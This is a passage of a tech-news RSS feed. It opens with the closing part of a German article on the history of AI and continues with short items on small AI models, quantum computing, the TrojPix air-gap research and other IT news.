<p>Ein KI-Meilenstein in den 90er Jahren war der erste Sieg einer KI-Schachmaschine über den Schachweltmeister. 1997 bezwang der <a href="https://www.computerwoche.de/industry/" target="_blank" class="idgGlossaryLink">IBM</a>-Rechner Deep Blue in einem offiziellen Turnier den damals amtierenden Schachweltmeister Garry Kasparov. Dieses Ereignis galt als historischer Sieg der Maschine über den Menschen in einem Bereich, in dem der Mensch bislang die Oberhand hatte. Das Event sorgte weltweit für Furore und brachte IBM viel Aufmerksamkeit und Renommee. Heute gelten Computer im Schach als unschlagbar. Dennoch fiel auf den Sieg des Computers auch ein Schatten, weil Deep Blue seinen Erfolg weniger seiner künstlichen, kognitiven Intelligenz verdankte, sondern mit roher Gewalt (“Brute Force”) alle nur denkbaren Züge soweit wie möglich durchrechnete.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="1997 bezwang erstmals ein Computer – IBMs Deep Blue – den amtierenden Schachweltmeister." title="1997 bezwang erstmals ein Computer – IBMs Deep Blue – den amtierenden Schachweltmeister." src="https://images.computerwoche.de/bdb/2683553/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">1997 bezwang erstmals ein Computer – IBMs Deep Blue – den amtierenden Schachweltmeister.</p></figcaption></figure><p class="imageCredit">
					Foto: IBM</p></div>




<p>In dieser Zeit bekam auch die bis dahin eher dahindümpelnde <a href="https://www.computerwoche.de/article/2762550/autonome-helfer-auf-raedern-erobern-werkshallen.html" target="_blank" class="idgGlossaryLink">Robotik</a> neuen Auftrieb. Der ab 1997 jährlich ausgetragene RoboCup demonstrierte eindrucksvoll, was KI und Robotik leisten können. Wissenschaftler und Studenten aus der ganzen Welt treffen sich seitdem regelmässig, um ihre Roboter-Teams gegeneinander im Fußball antreten zu lassen. Inzwischen fechten die mobilen Roboter auch andere Wettkämpfe aus als Fußball. Ab etwa 2005 entwickeln sich Serviceroboter zu einem dominanten Forschungsgebiet der KI und um 2010 beginnen autonome Roboter, ihr Verhalten durch maschinelles Lernen zu verbessern.</p>



<h2 class="wp-block-heading">Die kommerzielle Wende: KI ab 2010</h2>



<p>Die aktuelle KI-Phase startete etwa um 2010 mit der beginnenden Kommerzialisierung. KI-Anwendungen verließen die Forschungslabors und machten sich in Alltagsanwendungen breit. Insbesondere die KI-Gebiete maschinelles Lernen und Natural Language Processing boomen. Hinzu kommen neuronale Netze, die ihre zweite, diesmal sehr erfolgreiche Wiedergeburt erleben.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="IBM Watson war 2011 Sieger in einem Wissensquiz mit menschlichen Kandidaten. IBM vermarktet Watson nun als kognitives System für verschiedene Einsatzbereiche." title="IBM Watson war 2011 Sieger in einem Wissensquiz mit menschlichen Kandidaten. IBM vermarktet Watson nun als kognitives System für verschiedene Einsatzbereiche." src="https://images.computerwoche.de/bdb/2683555/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">IBM Watson war 2011 Sieger in einem Wissensquiz mit menschlichen Kandidaten. IBM vermarktet Watson nun als kognitives System für verschiedene Einsatzbereiche.</p></figcaption></figure><p class="imageCredit">
					Foto: IBM</p></div>




<p>Die Hauptursachen für die kommerzielle Wende waren verbesserte KI-Verfahren und leistungsfähigere Software und Hardware: Softwareseitig erwiesen sich die weiter entwickelten neuronalen Netze und vor allem eine Variante – Deep Learning – als sehr robust und vielseitig einsetzbar. Weitere Trends wie Multi-Core-Architekturen, verbesserte Algorithmen und superschnelle In-Memory-Datenbanken machten KI-Anwendungen gerade auch für den Unternehmensbereich attraktiv. Ein zusätzlicher Faktor ist auch die zunehmende Verfügbarkeit großer Mengen strukturierter und unstrukturierter Daten aus einer Vielzahl von Quellen wie Sensoren oder digitalisierten Dokumenten und Bildern, mit denen sich die Lernalgorithmen “trainieren” lassen.</p>



<p>Im Zuge dieser verbesserten technischen und ökonomischen Möglichkeiten entdeckten auch die großen IT-Konzerne die KI: Den Grundstein legte 2011 <a href="https://www.computerwoche.de/industry/" target="_blank" class="idgGlossaryLink">IBM</a> mit Watson. Watson kann natürliche Sprache verstehen und schwierige Fragen sehr schnell beantworten. 2011 konnte Watson in einem US-amerikanischen TV-Quiz zwei menschliche Kandidaten beeindruckend schlagen. In der Folge baute IBM Watson zu einem kognitiven System aus, das Algorithmen der natürlichen Sprachverarbeitung und des Information Retrieval, Methoden des maschinellen Lernens, der Wissensrepräsentation und der automatischen Inferenz vereinte. Inzwischen wurde Watson in verschiedenen Gebieten wie Medizin und Finanzwesen erfolgreich angewendet und IBM hat einen Großteil seines Business auf Watson ausgerichtet.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Maschine schlägt Mensch: 2016 besiegte Google’s Machine Learning System AlphaGo den Weltmeister im Spiel Go." title="Maschine schlägt Mensch: 2016 besiegte Google’s Machine Learning System AlphaGo den Weltmeister im Spiel Go." src="https://images.computerwoche.de/bdb/2681344/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Maschine schlägt Mensch: 2016 besiegte Google’s Machine Learning System AlphaGo den Weltmeister im Spiel Go.</p></figcaption></figure><p class="imageCredit">
					Foto: Google</p></div>




<p>Andere Big Player zogen nach. Google, Microsoft, Facebook, Amazon und Apple investieren viele Millionen in KI und stellen KI-Anwendungen und -Services bereit. Ein weiteres großes Event der KI-Geschichte ereignete sich im Januar 2016: Damals konnte Googles AlphaGo den vermutlich weltbesten Go-Spieler mit 4 zu 1 besiegen. Wegen der größeren Komplexität von Go im Vergleich zu Schach ist das japanische Brettspiel mit traditionellen Brute-Force-Algorithmen, wie sie noch Deep Blue verwendete, praktisch nicht bezwingbar. Deep Learning und andere aktuelle KI-Verfahren führten hier zum Erfolg.</p>



<p>Heute sind KI- und Machine-Learning-Verfahren in unterschiedlichsten Ausprägungen nicht nur bei den großen IT-Konzernen im Einsatz. Vor allem große und mittelständische Anwenderunternehmen aus fast allen Branchen nutzen KI-basierte Systeme, um Prozesse zu verbessern, Kundenschnittstellen zu optimieren oder ganz neue Produkte und Märkte zu entwickeln. Die Vielzahl an einschlägigen Cloud-basierten Services hat den Einsatz auch für kleinere Organisationen ohne große Entwicklungsbudgets erschwinglich gemacht.</p>



<h2 class="wp-block-heading">Auf in den Mainstream: ChatGPT &amp; Generative AI ab 2022</h2>



<p>Seit OpenAI im November 2022 seinen KI-Chatbot ChatGPT öffentlich verfügbar gemacht hat, hat sich ein Hype entfaltet, der innerhalb der IT-Branche am ehesten mit dem großen Run auf die Cloud vergleichbar ist. Allerdings schaffte ChatGPT etwas, das anderen KI-Tools bis dahin kaum gelungen war – nämlich künstliche Intelligenz auch zum Dauergesprächsthema <a href="https://www.tagesschau.de/wissen/forschung/ki-kreativitaet-101.html" title="in den Mainstream-Medien" target="_blank" rel="noopener">in den Mainstream-Medien</a> zu machen. </p>



<p>ChatGPT rückte auch andere Tools wie DALL-E oder Stable Diffusion ins Rampenlicht und befeuerte die berufliche wie private Nutzung der Tools. Die werden häufig als Modelle bezeichnet, weil sie versuchen, einen Aspekt der realen Welt auf der Grundlage einer (manchmal sehr großen) Teilmenge von Informationen zu simulieren oder zu modellieren. Die Ergebnisse können Erstaunen hervorrufen, werfen aber auch <a title="Fragen auf" href="https://www.computerwoche.de/article/2803252/dumme-kuenstliche-intelligenz.html" target="_blank">Fragen auf</a>. Abseits des Hypes geht unter der glänzenden Oberfläche der Systeme <a title="weniger Revolutionäres vor sich" href="https://www.computerwoche.de/article/2820404/6-fakten-ueber-chatgpt.html" target="_blank">weniger Revolutionäres vor sich</a> als man glaubt: Im Grunde geht es bei Generative AI darum, mit Hilfe von <a class="idgGlossaryLink" href="https://www.computerwoche.de/article/2752649/was-sie-ueber-maschinelles-lernen-wissen-muessen.html" target="_blank">Machine Learning</a> große Datenmengen zu verarbeiten, die in vielen Fällen aus dem Netz zusammengesammelt und anschließend als Grundlage für Vorhersagen genutzt werden. </p>



<p>Wie ChatGPT sich selbst definiert, lesen Sie im <a title="COMPUTERWOCHE-Interview mit der KI-Instanz" href="https://www.computerwoche.de/article/2819836/was-ist-chatgpt.html" target="_blank">COMPUTERWOCHE-Interview mit der KI-Instanz</a>. Mehr Informationen zur Funktionsweise, Anwendungsfällen sowie den Limitationen von Generative AI erfahren Sie in unserem <a title="Grundlagenartikel zum Thema" href="https://www.computerwoche.de/article/2821922/was-ist-generative-ai.html" target="_blank">Grundlagenartikel zum Thema</a> sowie diesem weiterführenden Beitrag zum Thema <a title="Large Language Models" href="https://www.computerwoche.de/article/2823883/was-sind-llms.html" target="_blank">Large Language Models</a> (LLMs).</p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Small AI Models Gain Traction Around the World]]></title>
<description><![CDATA[locater16 shares a report from IEEE Spectrum: One morning in 2019, Adebayo Alonge was in a Cape Town hotel room, preparing to demonstrate his startup's AI answer to a serious problem in African health care: counterfeit medication, which kills thousands of people across the continent every year. T...]]></description>
<link>https://tsecurity.de/de/3650073/it-security-nachrichten/small-ai-models-gain-traction-around-the-world/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3650073/it-security-nachrichten/small-ai-models-gain-traction-around-the-world/</guid>
<pubDate>Tue, 07 Jul 2026 01:08:12 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[locater16 shares a report from IEEE Spectrum: One morning in 2019, Adebayo Alonge was in a Cape Town hotel room, preparing to demonstrate his startup's AI answer to a serious problem in African health care: counterfeit medication, which kills thousands of people across the continent every year. The RxScanner is a handheld spectrometer that scans a pill with infrared light, then sends the item's molecular profile to an AI model equipped with a pharmaceutical database. In seconds, the AI identifies the medication from its molecular profile -- or reports that it's phony.
 
Pharmacies were using the system in more than a dozen countries, including Ghana, Kenya, Myanmar, and Alonge's native Nigeria. But that morning in South Africa, it didn't work. "I was shocked," Alonge says... So Alonge immediately asked his engineers to shrink the AI model down to a smaller, low-power, unconnected version that could run entirely on his Android phone. They produced it 2 hours later, and that saved the demo. More importantly, the work birthed a new version of his device, which can authenticate a pill in places without broadband, computers, or even reliable electricity. It also turned Alonge into an advocate for this kind of "small AI." "The article goes on to detail other immediately useful 'small' AI applications without any subscription or billion dollar data centers needed," writes locator16. For example, Bala Murugan and colleagues at Vellore Institute of Technology in India developed a drone-based system that photographs cashew plants and identifies disease-indicating splotches on the plants. The key advantage is that all processing happens on the drone itself, so farmers do not need a computer, broadband connection, or cloud server access.
 
In a Uruguayan vineyard, researchers developed small-AI systems to identify ant infestations. The article doesn't go deep into the deployment details, but it presents this as another example of a narrow, localized model trained to recognize a specific agricultural threat. Small AI has also been used to detect the presence of malaria-carrying mosquitoes in multiple countries. This is especially useful in regions where public-health teams may lack reliable network access or expensive lab infrastructure, but still need fast, local detection.
 
In parts of Brazil without access to more complex medical equipment, researchers have used small AI to run electrocardiograms from an Arduino device. The article also describes Marcelo Jose Rovai's work on a TinyML model that generates electrocardiograms in a patient simulator lab. Rovai also describes a newer experiment using an Arduino UNO Q with a Qualcomm chipset. The device runs a language model locally, collects sensor data, and analyzes it to detect tiny pools of water where mosquitoes might breed -- while using only about 3 watts of power.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Small+AI+Models+Gain+Traction+Around+the+World%3A+https%3A%2F%2Fslashdot.org%2Fstory%2F26%2F07%2F06%2F221233%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fslashdot.org%2Fstory%2F26%2F07%2F06%2F221233%2Fsmall-ai-models-gain-traction-around-the-world%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://slashdot.org/story/26/07/06/221233/small-ai-models-gain-traction-around-the-world?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Boffins bet on quantum computers, AI supers to solve fusion fuel dilemma]]></title>
<description><![CDATA[Department of Energy, Cleveland Clinic, and IBM simulate a soup of molten salts and techno babble in pursuit of tritium]]></description>
<link>https://tsecurity.de/de/3649851/it-nachrichten/boffins-bet-on-quantum-computers-ai-supers-to-solve-fusion-fuel-dilemma/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3649851/it-nachrichten/boffins-bet-on-quantum-computers-ai-supers-to-solve-fusion-fuel-dilemma/</guid>
<pubDate>Mon, 06 Jul 2026 23:03:30 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Department of Energy, Cleveland Clinic, and IBM simulate a soup of molten salts and techno babble in pursuit of tritium]]></content:encoded>
</item>
<item>
<title><![CDATA[Five questions for Dr. Rubin, who’s armed with a mic and a bowtie]]></title>
<description><![CDATA[Bullshit is cheap but truth is expensive. Anyone with half a brain cell can post wild misinformation that goes mega viral, which wastes the time and expertise of highly trained people who feel an obligation to inform others of the truth. Today I want you to meet one of those highly-trained people...]]></description>
<link>https://tsecurity.de/de/3649513/it-nachrichten/five-questions-for-dr-rubin-whos-armed-with-a-mic-and-a-bowtie/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3649513/it-nachrichten/five-questions-for-dr-rubin-whos-armed-with-a-mic-and-a-bowtie/</guid>
<pubDate>Mon, 06 Jul 2026 19:47:59 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Bullshit is cheap but truth is expensive. Anyone with half a brain cell can post wild misinformation that goes mega viral, which wastes the time and expertise of highly trained people who feel an obligation to inform others of the truth. Today I want you to meet one of those highly-trained people, Dr. Zachary Rubin, […]]]></content:encoded>
</item>
<item>
<title><![CDATA[7 cheap smart home devices our editors use and love — handy gadgets to upgrade your home for under $50 / £50]]></title>
<description><![CDATA[Smart home kit doesn't have to cost a fortune — these gadgets make a big difference on a small budget.]]></description>
<link>https://tsecurity.de/de/3649266/it-nachrichten/7-cheap-smart-home-devices-our-editors-use-and-love-handy-gadgets-to-upgrade-your-home-for-under-50-50/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3649266/it-nachrichten/7-cheap-smart-home-devices-our-editors-use-and-love-handy-gadgets-to-upgrade-your-home-for-under-50-50/</guid>
<pubDate>Mon, 06 Jul 2026 17:49:25 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Smart home kit doesn't have to cost a fortune — these gadgets make a big difference on a small budget.]]></content:encoded>
</item>
<item>
<title><![CDATA[AMD’s Ryzen AI Halo makes local AI look easy, but at $4K, easy doesn't come cheap]]></title>
<description><![CDATA[128 GB of memory! In this economy?]]></description>
<link>https://tsecurity.de/de/3649227/it-nachrichten/amds-ryzen-ai-halo-makes-local-ai-look-easy-but-at-4k-easy-doesnt-come-cheap/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3649227/it-nachrichten/amds-ryzen-ai-halo-makes-local-ai-look-easy-but-at-4k-easy-doesnt-come-cheap/</guid>
<pubDate>Mon, 06 Jul 2026 17:34:09 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[128 GB of memory! In this economy?]]></content:encoded>
</item>
<item>
<title><![CDATA[IQM Quantum Computers acquires selected assets of Quantistry]]></title>
<description><![CDATA[The acquisition will integrate Quantistry's application software platform, algorithm simulation libraries and machine learning layer with IQM's hardware infrastructure.
Read more: IQM Quantum Computers acquires selected assets of Quantistry]]></description>
<link>https://tsecurity.de/de/3649052/it-nachrichten/iqm-quantum-computers-acquires-selected-assets-of-quantistry/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3649052/it-nachrichten/iqm-quantum-computers-acquires-selected-assets-of-quantistry/</guid>
<pubDate>Mon, 06 Jul 2026 16:18:18 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The acquisition will integrate Quantistry's application software platform, algorithm simulation libraries and machine learning layer with IQM's hardware infrastructure.</p>
<p>Read more: <a rel="nofollow" href="https://www.siliconrepublic.com/business/iqm-quantum-computers-acquires-selected-assets-berlin-quantistry">IQM Quantum Computers acquires selected assets of Quantistry</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Cheap AI Will Handle Most Tasks]]></title>
<description><![CDATA[Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:2 Future AI systems are expected to split work between lightweight local models and larger cloud-based foundation models. Simple tasks can be completed by inexpensive models, while advanced reasoning is reserved for more capable—and...]]></description>
<link>https://tsecurity.de/de/3648983/it-security-video/cheap-ai-will-handle-most-tasks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3648983/it-security-video/cheap-ai-will-handle-most-tasks/</guid>
<pubDate>Mon, 06 Jul 2026 16:04:08 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:2 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/VvrowpkIjcc?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Future AI systems are expected to split work between lightweight local models and larger cloud-based foundation models. Simple tasks can be completed by inexpensive models, while advanced reasoning is reserved for more capable—and more expensive—AI.<br />
<br />
This hybrid approach could lower costs, reduce latency, and allow more AI processing to happen directly on devices. At the same time, organizations will need to decide when it's worth paying for premium models and how to route work efficiently between them.<br />
<br />
Will most AI applications evolve into layered systems that automatically choose the right model for each task?<br />
<br />
Subscribe to our podcasts: https://securityweekly.com/subscribe<br />
<br />
#MachineLearning #Technology #SecurityWeekly #Cybersecurity #InformationSecurity #AI #InfoSec<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[New TrojPix Attack Lets Attackers Access Air-gapped Computers From 208 Meters]]></title>
<description><![CDATA[A novel electromagnetic (EM) covert-channel attack, dubbed TrojPix, can steal sensitive data from already-compromised air-gapped computers over distances of up to 208 meters, even through concrete walls, by exploiting only the pixels displayed on a victim’s screen. The technique was…
Read more →
...]]></description>
<link>https://tsecurity.de/de/3648498/it-security-nachrichten/new-trojpix-attack-lets-attackers-access-air-gapped-computers-from-208-meters/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3648498/it-security-nachrichten/new-trojpix-attack-lets-attackers-access-air-gapped-computers-from-208-meters/</guid>
<pubDate>Mon, 06 Jul 2026 12:50:35 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A novel electromagnetic (EM) covert-channel attack, dubbed TrojPix, can steal sensitive data from already-compromised air-gapped computers over distances of up to 208 meters, even through concrete walls, by exploiting only the pixels displayed on a victim’s screen. The technique was…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/new-trojpix-attack-lets-attackers-access-air-gapped-computers-from-208-meters/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/new-trojpix-attack-lets-attackers-access-air-gapped-computers-from-208-meters/">New TrojPix Attack Lets Attackers Access Air-gapped Computers From 208 Meters</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[TrojPix Attacks allow Hackers to Access Data from air-gapped Computers from 208 Meters]]></title>
<description><![CDATA[A novel electromagnetic (EM) covert-channel attack, dubbed TrojPix, can steal sensitive data from already-compromised air-gapped computers over distances of up to 208 meters, even through concrete walls, by exploiting only the pixels displayed on a victim’s screen. The technique was developed by ...]]></description>
<link>https://tsecurity.de/de/3648324/it-security-nachrichten/trojpix-attacks-allow-hackers-to-access-data-from-air-gapped-computers-from-208-meters/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3648324/it-security-nachrichten/trojpix-attacks-allow-hackers-to-access-data-from-air-gapped-computers-from-208-meters/</guid>
<pubDate>Mon, 06 Jul 2026 11:36:31 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A novel electromagnetic (EM) covert-channel attack, dubbed TrojPix, can steal sensitive data from already-compromised air-gapped computers over distances of up to 208 meters, even through concrete walls, by exploiting only the pixels displayed on a victim’s screen. The technique was developed by a team from Shandong University and Quan Cheng Laboratory and is slated for […]</p>
<p>The post <a href="https://cybersecuritynews.com/trojpix-attack/">TrojPix Attacks allow Hackers to Access Data from air-gapped Computers from 208 Meters</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[New TrojPix Attack Leaks Data From Air-Gapped Systems via Video Cable Emissions]]></title>
<description><![CDATA[Researchers at Shandong University have shown a fast new way to pull data off computers that are cut off from every network. The technique, called TrojPix, tweaks on-screen pixels in ways the eye cannot see, so that the video cable carrying them radiates…
Read more →
The post New TrojPix Attack L...]]></description>
<link>https://tsecurity.de/de/3648300/it-security-nachrichten/new-trojpix-attack-leaks-data-from-air-gapped-systems-via-video-cable-emissions/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3648300/it-security-nachrichten/new-trojpix-attack-leaks-data-from-air-gapped-systems-via-video-cable-emissions/</guid>
<pubDate>Mon, 06 Jul 2026 11:24:16 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Researchers at Shandong University have shown a fast new way to pull data off computers that are cut off from every network. The technique, called TrojPix, tweaks on-screen pixels in ways the eye cannot see, so that the video cable carrying them radiates…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/new-trojpix-attack-leaks-data-from-air-gapped-systems-via-video-cable-emissions/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/new-trojpix-attack-leaks-data-from-air-gapped-systems-via-video-cable-emissions/">New TrojPix Attack Leaks Data From Air-Gapped Systems via Video Cable Emissions</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[New TrojPix Attack Leaks Data From Air-Gapped Systems via Video Cable Emissions]]></title>
<description><![CDATA[Researchers at Shandong University have shown a fast new way to pull data off computers that are cut off from every network. The technique, called TrojPix, tweaks on-screen pixels in ways the eye cannot see, so that the video cable carrying them radiates a faint radio signal a nearby receiver can...]]></description>
<link>https://tsecurity.de/de/3648264/it-security-nachrichten/new-trojpix-attack-leaks-data-from-air-gapped-systems-via-video-cable-emissions/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3648264/it-security-nachrichten/new-trojpix-attack-leaks-data-from-air-gapped-systems-via-video-cable-emissions/</guid>
<pubDate>Mon, 06 Jul 2026 11:10:15 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Researchers at Shandong University have shown a fast new way to pull data off computers that are cut off from every network. The technique, called TrojPix, tweaks on-screen pixels in ways the eye cannot see, so that the video cable carrying them radiates a faint radio signal a nearby receiver can decode.

But TrojPix works only once malware is already on the target machine, so it]]></content:encoded>
</item>
<item>
<title><![CDATA[DistroWatch Weekly, Issue 1180]]></title>
<description><![CDATA[The DistroWatch news feed is brought to you by TUXEDO COMPUTERS.  This week in DistroWatch Weekly: 
Review: FreeBSD 15.1 with an install-time desktop
News: Asahi fixes macOS boot bug, reasons to run Gentoo, Ubuntu reverts Rust-based copy command, Astral gets WINE port
Questions and answers: Vario...]]></description>
<link>https://tsecurity.de/de/3647479/unix-server/distrowatch-weekly-issue-1180/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3647479/unix-server/distrowatch-weekly-issue-1180/</guid>
<pubDate>Mon, 06 Jul 2026 02:16:22 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The DistroWatch news feed is brought to you by <a href="https://www.tuxedocomputers.com/">TUXEDO COMPUTERS</a>.  This week in DistroWatch Weekly: <br>
Review: FreeBSD 15.1 with an install-time desktop<br>
News: Asahi fixes macOS boot bug, reasons to run Gentoo, Ubuntu reverts Rust-based copy command, Astral gets WINE port<br>
Questions and answers: Various tools for running admin commands<br>
Released last week: Slackel 9.0 "MATE", Mageia 10, Kali Linux 2026.2,....]]></content:encoded>
</item>
<item>
<title><![CDATA[Umgang mit defektem RAM (cosin2026)]]></title>
<description><![CDATA[Fehlerhafter Arbeitsspeicher kann schwierig zu erkennen sein und zu ernsten Konsequenzen führen. Anhand eines Computers mit leicht fehlerhaftem RAM Modul zeige ich verschiedene Methoden zur Erkennung und eine Möglichkeit, das System unter Linux  trotzdem zu benutzen.
about this event: https://fah...]]></description>
<link>https://tsecurity.de/de/3646140/it-security-video/umgang-mit-defektem-ram-cosin2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3646140/it-security-video/umgang-mit-defektem-ram-cosin2026/</guid>
<pubDate>Sun, 05 Jul 2026 05:03:19 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Fehlerhafter Arbeitsspeicher kann schwierig zu erkennen sein und zu ernsten Konsequenzen führen. Anhand eines Computers mit leicht fehlerhaftem RAM Modul zeige ich verschiedene Methoden zur Erkennung und eine Möglichkeit, das System unter Linux  trotzdem zu benutzen.
about this event: https://fahrplan.cosin.ch/fahrplan/2026/events/461a7e0a-3729-572b-a87d-59eb73fda506/]]></content:encoded>
</item>
<item>
<title><![CDATA[What Is a Quantum Computer Good For? Absolutely Nothing - Yet]]></title>
<description><![CDATA[The Verge argues that researchers "have made genuine progress in quantum computing — it's just been largely incremental and too esoteric to immediately capture the public's imagination." 

And there are predictions that quantum computers will finally do something useful as soon as 2028:


The dra...]]></description>
<link>https://tsecurity.de/de/3645512/it-security-nachrichten/what-is-a-quantum-computer-good-for-absolutely-nothing-yet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3645512/it-security-nachrichten/what-is-a-quantum-computer-good-for-absolutely-nothing-yet/</guid>
<pubDate>Sat, 04 Jul 2026 16:53:05 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The Verge argues that researchers "have made genuine progress in quantum computing — it's just been largely incremental and too esoteric to immediately capture the public's imagination." 

And there are predictions that quantum computers will finally do something useful as soon as 2028:


The drama can overshadow the real progress in quantum computing...
Researchers have improved the qubits themselves, so they hold onto information longer. When they hold onto information longer, you can fit in more operations and do more complicated algorithms. Last November, Andrew Houck of Princeton University and his colleagues reported that they'd made a superconducting qubit that can hold onto information three times longer than the previous record holder... And in the last two years, researchers have made substantial strides in what's known as quantum error correction... In addition, researchers have developed algorithms to correct errors while the quantum computer operates... Microsoft claimed, which experts dispute, that it made an object made of electrons known as a Majorana particle [which should make fewer errors and be easier to scale up]... 


"We 100 percent stand behind our results. We stand by our roadmap," Microsoft's quantum lead, Chetan Nayak, responded in an interview with The Verge. In an email statement, he added that Microsoft's "papers do show that we are creating and controlling Majorana [particles]... Microsoft's supporting evidence is unconvincing [according to [Henry Legg, a physicist from the University of St. Andrews and a longtime Microsoft critic]Rnqyq. What it claimed as evidence of a Majorana particle, he says, could actually be due to quantum dots forming in its device. Quantum dots are electron-containing objects that are not useful for Microsoft's quantum computer. It also bases its claim on data from a single device, says Legg. He wants to see Microsoft replicate the results in multiple chips. "If you repeatedly try and find Jesus in your toast, eventually you'll find Jesus in your toast," he says. "But that one piece of toast doesn't mean you had some kind of epiphany." 


"While we appreciate the religious fervor, our data maintains the strength and consistency of our roadmap, as we have for the past several years across previous milestones. We look forward to delivering the world's first quantum machine and sharing the energy of our achievements with the world," wrote Nayak in response. 

Past spurious work from Microsoft-affiliated researchers adds to the doubt. In 2021, the journal Nature retracted an article from Microsoft-affiliated researchers in which they'd claimed strong experimental evidence that they'd created a Majorana particle.

 

"Even hopeful experts have varying opinions about when a quantum computer will demonstrate something useful," the article acknowledges. 


But quantum computing lecturer Eleanor Crane of King's College London predicts
researchers will have demonstrated a useful scientific simulation on a quantum computer by 2028. 


Thanks to Slashdot reader joshuark for sharing the article.
<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=What+Is+a+Quantum+Computer+Good+For%3F+Absolutely+Nothing+-+Yet%3A+https%3A%2F%2Fscience.slashdot.org%2Fstory%2F26%2F07%2F04%2F0232223%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fscience.slashdot.org%2Fstory%2F26%2F07%2F04%2F0232223%2Fwhat-is-a-quantum-computer-good-for-absolutely-nothing---yet%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://science.slashdot.org/story/26/07/04/0232223/what-is-a-quantum-computer-good-for-absolutely-nothing---yet?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[As auto costs rise, will the US miss the golden age of electric vehicles?]]></title>
